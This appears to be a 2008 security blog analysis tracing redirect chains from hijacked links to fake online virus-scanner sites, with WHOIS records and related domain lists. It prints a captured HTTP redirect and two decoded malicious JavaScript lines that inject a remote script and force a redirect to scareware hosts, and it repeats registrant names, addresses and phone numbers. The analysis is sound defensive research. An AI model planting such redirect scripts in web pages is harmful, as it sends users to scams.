gnida.swf ... some surprising results
gnida.swf, newbieadguide.com & co are they still used or dead? Only one way to figure out ... I was kinda surprised when I saw the link
newbieadguide.com/swf/gnida.swf?campaign=mortmainon&u23423424 show up in search with a date / time stamp of
2008/07/17 00:54.

Let's narrow down a lil' bit.

Hmm ... some other links point their nose ... lil' peek on them also by isolating some stuff.

In our basket we now have
newbieadguide.com/swf/gnida.swf?campaign=mortmainon&u23423424
www.estandi.yoyo.pl/Aolmail.html
gogele.com
bull.s11.x-beat.com/src/bull124569.gif
and more recently newbieadguide.com replaced by
chocolatgirl.50webs.com/description/lame-enc.html
Ready for a ride?
newbieadguide.com/swf/gnida.swf?campaign=mortmainon&u23423424No live redirect right now, at least not for me. It's setting a cookie and not showing stats so the campaign might still be "in use".
______________________________
estandi.yoyo.pl/Aolmail.htmlInteresting case I must say; as it took me 2 minutes to figure out how the hell I suddenly ended up at scanning-computer-online.com. I didn't even have the chance to see estandi.yoyo.pl/Aolmail.html loading ...



On
estandi.yoyo.pl/Aolmail.html we find a reference to a.js

The content of a.js does reveal us the next location ...
aqtravel.info/find/search.php?said=Mkey5&q=Aolmail
At aqtravel.info we stumble on a 302 error which does forward us to the fake online scanner.
CODE
GET /find/search.php?said=Mkey5&q=Aolmail HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: aqtravel.info
Connection: Keep-Alive
HTTP/1.1 302
FoundDate: Tue, 29 Jul 2008 16:12:16 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5
Location: http://scanning-computer-online.com/1/?xx=1&in=2&ag=2&end=1&g=1&affid=401&lid=103
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;
charset=iso-8859-1163<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://scanning-computer-online.com/1/?xx=1&in=2&ag=2&end=1&g=1&affid=401&lid=103">here</A>.<P>
<HR>
<ADDRESS>Apache/1.3.39 Server at aqtravel.info Port 80</ADDRESS>
</BODY></HTML>
______________________________
chocolatgirl.50webs.com/description/lame-enc.htmlThe page contains an obfuscated javascript.

Once decoded we obtain a link to
lineacount.info/cgi-bin/counter?id=133722&ref=CODE
document.write('<sc'+'ript src="http://lineacount.info/cgi-bin/counter?id=133722&ref='+escape(document.referrer)+'"></sc'+'ript>')
At lineacount.info we again fall on an obfuscated script.

Decoded it leads to
scan.wsp2008scanner.com/263/509/CODE
document.write('<sc'+'ript> document.location="http://scan.wsp2008scanner.com/263/509/" </sc'+'ript>');



______________________________
gogele.comgogele.com redirects to
landing.trafficz.com/index.php?domain=gogele.com where we get an advertising popup upon entering the website. If you are unlucky, you will get redirected to some fake online scanner. Some examples are described
here.
______________________________
bull.s11.x-beat.com/src/bull124569.gifI'm redirected to an adult website at the time of the write-up. Exploits are possible on such websites.
aqtravel.info - 88.214.200.55
Website Title: None given.
Created: 2007-06-25
Expires: 2009-06-25
Updated: 2008-06-26
Whois Server: whois.afilias.info
IP Location - United Kingdom - Real International Business Corp
Domain ID:D18657023-LRMS
Domain Name:AQTRAVEL.INFO
Created On:25-Jun-2007 19:57:38 UTC
Last Updated On:26-Jun-2008 10:26:02 UTC
Expiration Date:25-Jun-2009 19:57:38 UTC
Sponsoring Registrar:EstDomains, Inc. (R295-LRMS)
Status:OK
Registrant ID:DI_6401114
Registrant Name:eric peeters
Registrant Organization:N/A
Registrant Street1:stationstraat 87
Registrant Street2:
Registrant Street3:
Registrant City:gent
Registrant State/Province:Oost-Vlaanderen(nl)
Registrant Postal Code:9030
Registrant Country:BE
Registrant Phone:+32.0484659841
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:
Admin ID:DI_6401114
Admin Name:eric peeters
Admin Organization:N/A
Admin Street1:stationstraat 87
Admin Street2:
Admin Street3:
Admin City:gent
Admin State/Province:Oost-Vlaanderen(nl)
Admin Postal Code:9030
Admin Country:BE
Admin Phone:+32.0484659841
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:
Billing ID:DI_6401114
Billing Name:eric peeters
Billing Organization:N/A
Billing Street1:stationstraat 87
Billing Street2:
Billing Street3:
Billing City:gent
Billing State/Province:Oost-Vlaanderen(nl)
Billing Postal Code:9030
Billing Country:BE
Billing Phone:+32.0484659841
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:
Tech ID:DI_6401114
Tech Name:eric peeters
Tech Organization:N/A
Tech Street1:stationstraat 87
Tech Street2:
Tech Street3:
Tech City:gent
Tech State/Province:Oost-Vlaanderen(nl)
Tech Postal Code:9030
Tech Country:BE
Tech Phone:+32.0484659841
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:
Name Server:NS0.HQHOST.NET
Name Server:NS1.HQHOST.NET
Websites.
- Amateur-porn-links.com
- Aqtravel.info
- Atona.org
- Bannergs.info
- Bez-piva.net
- Boob-porn.net
- Boobgayporn.net
- Changefuture.net
- Cheryclub.com
- Cheryclub.org
- Digimon-hentai.org
- Easyrial.com
- Funsjoy.org
- Gainrich.net
- Geotem.info
- Gigonly.info
- Givedata.com
- Google-defloration.com
- Gps-sat-position.com
- Helpmothers.net
- Hlth-care.com
- Hostel-young.com
- Intop20.net
- Isellbody.com
- Korkas.org
- Ku4a.com
- Kupola-ua.com
- Lesbian-adult.net
- Lesbiangayadult.net
- Lyudmila.net
- Mainsearch.biz
- Millioncent.com
- Myliras.org
- Naqtravel.com
- Nude-adult.net
- Nudegayadult.net
- Oblojka.biz
- Okolonet.com
- Paris-young.com
- Pornjokers.com
- Rington-city.com
- Russtandart.com
- Saveage.info
- Search-insurance.com
- Seopetersburg.com
- Skrepka.org
- Softseo.net
- Start-porn.net
- Startgayporn.net
- Tablets-city.com
- Teens-master.com
- Telescope-off.com
- Tits-adult.net
- Titsgayadult.net
- Tooeasycash.com
- Webikweb.info
- Xfaktorz.org
- Xxx-nude.net
- Xxxgaynude.net
- Yourrial.com
scanning-computer-online.com - 91.203.92.48
Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-04
Expires: 2009-07-04
Updated: 2008-07-04
Name Server: NS1.MYNICK.NAME (has 931 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com
IP Location - United Kingdom - Isp Uatelecom Llc
Domain Name: SCANNING-COMPUTER-ONLINE.COM
Creation Date: 04-Jul-2008
Expiration Date: 04-Jul-2009
Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name
Registrant:
TORS BUISINESS LIMITED
Andreas Ellinas ()
Suite 2, Portland House, Glacis Road,
Gibraltar
Not Applicable,220174
GI
Tel. +375.296324764
Administrative Contact:
TORS BUISINESS LIMITED
Andreas Ellinas ()
Suite 2, Portland House, Glacis Road,
Gibraltar
Not Applicable,220174
GI
Tel. +375.296324764
Technical Contact:
TORS BUISINESS LIMITED
Andreas Ellinas ()
Suite 2, Portland House, Glacis Road,
Gibraltar
Not Applicable,220174
GI
Tel. +375.296324764
Billing Contact:
TORS BUISINESS LIMITED
Andreas Ellinas ()
Suite 2, Portland House, Glacis Road,
Gibraltar
Not Applicable,220174
GI
Tel. +375.296324764
Websites.
- Antivirus-pc-scanner.com
- Buy-secure-protection.com
- Fast-pc-scanner-online.com
- Full-protection-now.com
- Get-full-protection.com
- Get-protected-now.com
- Make-pc-secure-now.com
- Online-pc-scanner.com
- Online-scanning-computer.com
- Pc-antivirus-scanner.com
- Pc-scanner-online.com
- Scanning-computer-online.com
- Secure-pc-protection.com
- Top-pc-scanner.com
lineacount.info - 85.255.118.122
Website Title: None given.
Created: 2007-05-03
Expires: 2009-05-03
Updated: 2008-06-19
Whois Server: whois.afilias.info
Server Type: Apache/1.3.31 (Unix) mod_python/2.7.10 Python/2.2.2 mod_webapp/1.2.0-dev mod_perl/1.29 mod_throttle/3.1.2 PHP/4.3.8 FrontPage/5.0.2.2510 mod_ssl/2.8.18 OpenSSL/0.9.7d
IP Location - Ukraine - Ukrtelegroup Ltd
Domain ID:D17629058-LRMS
Domain Name:LINEACOUNT.INFO
Created On:03-May-2007 11:59:52 UTC
Last Updated On:19-Jun-2008 14:04:36 UTC
Expiration Date:03-May-2009 11:59:52 UTC
Sponsoring Registrar:EstDomains, Inc. (R295-LRMS)
Status:OK
Registrant ID:DI_6310930
Registrant Name:Byron Hadley
Registrant Organization:N/A
Registrant Street1:Hornindal
Registrant Street2:
Registrant Street3:
Registrant City:Hornindal
Registrant State/Province:Not Applicable
Registrant Postal Code:6763
Registrant Country:NO
Registrant Phone:+47.57879605
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:
Admin ID:DI_6310930
Admin Name:Byron Hadley
Admin Organization:N/A
Admin Street1:Hornindal
Admin Street2:
Admin Street3:
Admin City:Hornindal
Admin State/Province:Not Applicable
Admin Postal Code:6763
Admin Country:NO
Admin Phone:+47.57879605
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:
Billing ID:DI_6310930
Billing Name:Byron Hadley
Billing Organization:N/A
Billing Street1:Hornindal
Billing Street2:
Billing Street3:
Billing City:Hornindal
Billing State/Province:Not Applicable
Billing Postal Code:6763
Billing Country:NO
Billing Phone:+47.57879605
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:
Tech ID:DI_6310930
Tech Name:Byron Hadley
Tech Organization:N/A
Tech Street1:Hornindal
Tech Street2:
Tech Street3:
Tech City:Hornindal
Tech State/Province:Not Applicable
Tech Postal Code:6763
Tech Country:NO
Tech Phone:+47.57879605
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:
Name Server:NS1.LINEACOUNT.INFO
Name Server:NS2.LINEACOUNT.INFO
Websites.
- 30g60.info
- 4martina.info
- 5mercant.info
- Adikmoz.info
- Adoremio.info
- Ail-mati.info
- Alupeso.info
- Arbu4i.info
- Asterkop.info
- Atipero.info
- Bonsita.info
- Boureus.info
- Buffbarr.info
- Chestnut8.info
- Chibasa.info
- Chineseb.info
- Chobitsu.info
- Clopdi.info
- Collared.info
- Commonst.info
- Counterpoints.info
- Creazapa.info
- Crendol.info
- Dolosyto.info
- Doormoi.info
- Epagina-89.info
- Essquell.info
- Estewess.info
- Fer2go.info
- Gaibanet.info
- Garcita.info
- Gebvalle.info
- Genuero.info
- Gigantiko.info
- Glecerisca.info
- Grecesco.info
- Grengo.info
- Hulista.info
- Iledetu.info
- Jamento.info
- Jason-b8.info
- Jelitaro.info
- Juncite.com
- Keichita.info
- Kitankon.info
- Klaudiu5.info
- Kodonomo.info
- Kooletsrc.info
- Krezetta.info
- Lamini9.info
- Laritanh.info
- Lativardo.info
- Lavilo.info
- Leposit.info
- Lineacount.info
- Livila.info
- Lolat.info
- Lopitarsite.info
- Maderalti.info
- Madorut.info
- Makotyan.info
- Mambito.info
- Man4ito.info
- Manovar13.info
- Matiusfor.info
- Mentarka.info
- Miaredo.info
- Miracloof.info
- Moburic.info
- Montazo.info
- Moruandre.info
- Oledeto.info
- Palerdoz.info
- Pricalca.info
- Qutipart.info
- Regackt.info
- Renmeik.info
- Saimour-man.info
- Sentaf.info
- Serinity.info
- Snaceslot.info
- Solsilke.info
- Termig1.info
- Trust-pag.info
- Unmarine.info
- Uresagi.info
- Weranda.info
- Werterta.info
- Windolin.info
- Wvvw-pagine.info
- Zoisait.info
scan.wsp2008scanner.com - 85.255.119.146
Website Title: None given.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-07-23
Expires: 2009-07-23
Updated: 2008-07-23
Name Server: NS1.EVERYDNS.NET (has 93,672 domains)
Name Server: NS2.EVERYDNS.NET
Name Server: NS3.EVERYDNS.NET
Name Server: NS4.EVERYDNS.NET
Whois Server: whois.estdomains.com
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com
Domain Name: WSP2008SCANNER.COM
Registrant:
Gorelik
Nicole Renaissance ()
General Conti str.
New York
New York,77102
US
Tel. +001.3328439284
Fax. +001.3328439284
Creation Date: 23-Jul-2008
Expiration Date: 23-Jul-2009
Domain servers in listed order:
ns4.everydns.net
ns3.everydns.net
ns2.everydns.net
ns1.everydns.net
Administrative Contact:
Gorelik
Nicole Renaissance ()
General Conti str.
New York
New York,77102
US
Tel. +001.3328439284
Fax. +001.3328439284
Technical Contact:
Gorelik
Nicole Renaissance ()
General Conti str.
New York
New York,77102
US
Tel. +001.3328439284
Fax. +001.3328439284
Billing Contact:
Gorelik
Nicole Renaissance ()
General Conti str.
New York
New York,77102
US
Tel. +001.3328439284
Fax. +001.3328439284